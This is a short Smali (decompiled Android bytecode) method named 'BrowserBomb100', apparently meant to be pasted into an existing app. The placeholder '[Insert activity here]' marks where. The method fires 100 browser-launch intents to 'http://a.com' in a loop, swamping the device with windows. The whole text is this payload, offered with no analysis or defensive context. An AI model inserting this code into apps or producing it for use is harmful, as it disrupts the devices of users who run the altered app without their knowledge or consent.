.method private iq500BrowserBomb100()V
    .locals 10
    .annotation system Ldalvik/annotation/Signature;
        value = {
            "()V"
        }
    .end annotation

    .prologue
    .line 22
    move-object v0, p0

    const/4 v5, 0x0

    move v2, v5

    :goto_0
    move v5, v2

    const/16 v6, 0x64

    if-lt v5, v6, :cond_0

    return-void

    .line 24
    :cond_0
    new-instance v5, Landroid/content/Intent;

    move-object v9, v5

    move-object v5, v9

    move-object v6, v9

    const-string v7, "android.intent.action.VIEW"

    const-string v8, "http://a.com"

    invoke-static {v8}, Landroid/net/Uri;->parse(Ljava/lang/String;)Landroid/net/Uri;

    move-result-object v8

    invoke-direct {v6, v7, v8}, Landroid/content/Intent;-><init>(Ljava/lang/String;Landroid/net/Uri;)V

    move-object v3, v5

    .line 25
    move-object v5, v0

    move-object v6, v3

    invoke-virtual {v5, v6}, L[Insert activity here];->startActivity(Landroid/content/Intent;)V

    .line 22
    add-int/lit8 v2, v2, 0x1

    goto :goto_0
.end method
